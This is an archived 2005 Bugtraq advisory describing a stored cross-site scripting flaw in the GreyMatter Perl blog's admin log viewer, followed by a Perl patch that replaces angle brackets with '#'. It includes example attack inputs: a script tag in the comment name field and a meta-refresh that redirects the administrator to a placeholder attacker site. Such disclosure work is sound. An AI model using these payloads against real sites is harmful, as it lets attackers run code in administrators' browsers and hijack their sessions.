lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Wed, 31 Aug 2005 12:58:35 +0400 (MSD)
From: poizon@...urityinfo.ru
To: bugtraq@...urityfocus.com
Subject: XSS in GreyMatter blog


Graymatter - perl based web blog.
offsite: http://www.greymatterforums.com/
GM analyze posting comments and if post contain some dangerous code (like
<script></script>), administrator get message about it   in log files. Log
files contain  not only message, but dangerous code.
When admin try to look log files (Admin panel Options: "View Control Panel
Log"), code execute in admin's browser.
Example attack:
Add comments:
Name: <script>alert('XSS')</script>
Comment:
<meta http-equiv="refresh" content="0;
url=http://site_with_danger_content.evil"/>

And admin can't enter in "View Control Panel Log" menu, because this page 
is redirecting on attacker site.
Solution:
Edit gm-library.cgi. Like that:
-----------------------------------------------------------
open (FUNNYFEET, "gm-cplog.cgi");
@gmlogfile = <FUNNYFEET>;
close (FUNNYFEET);

foreach $gmlogfileline (@gmlogfile) {
	chomp ($gmlogfileline);
        $gmlogfileline=~s/<b>/#BOLD_OPEN#/ig;
        $gmlogfileline=~s/<\/b>/#BOLD_CLOSED#/ig;
        $gmlogfileline=~s/<font size="1">/#FONT_OPEN#/ig;
        $gmlogfileline=~s/<\/font>/#FONT_CLOSED#/ig;
        $gmlogfileline=~s/<|>|&lt;|&gt;/#/ig;
        $gmlogfileline=~s/#BOLD_OPEN#/<b>/ig;
        $gmlogfileline=~s/#BOLD_CLOSED#/<\/b>/iig;
        $gmlogfileline=~s/#FONT_OPEN#/<font size="1">/g;
        $gmlogfileline=~s/#FONT_CLOSED#/<\/font>/ig;
	print "$gmlogfileline<BR>";
}
print qq(<font size="1">All danger tags replace with # symbol</font><BR>);
-------------------------------------------------------
Sory for my english, it's not my primary language.
---------------------------------------------------------
http://www.securityinfo.ru

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ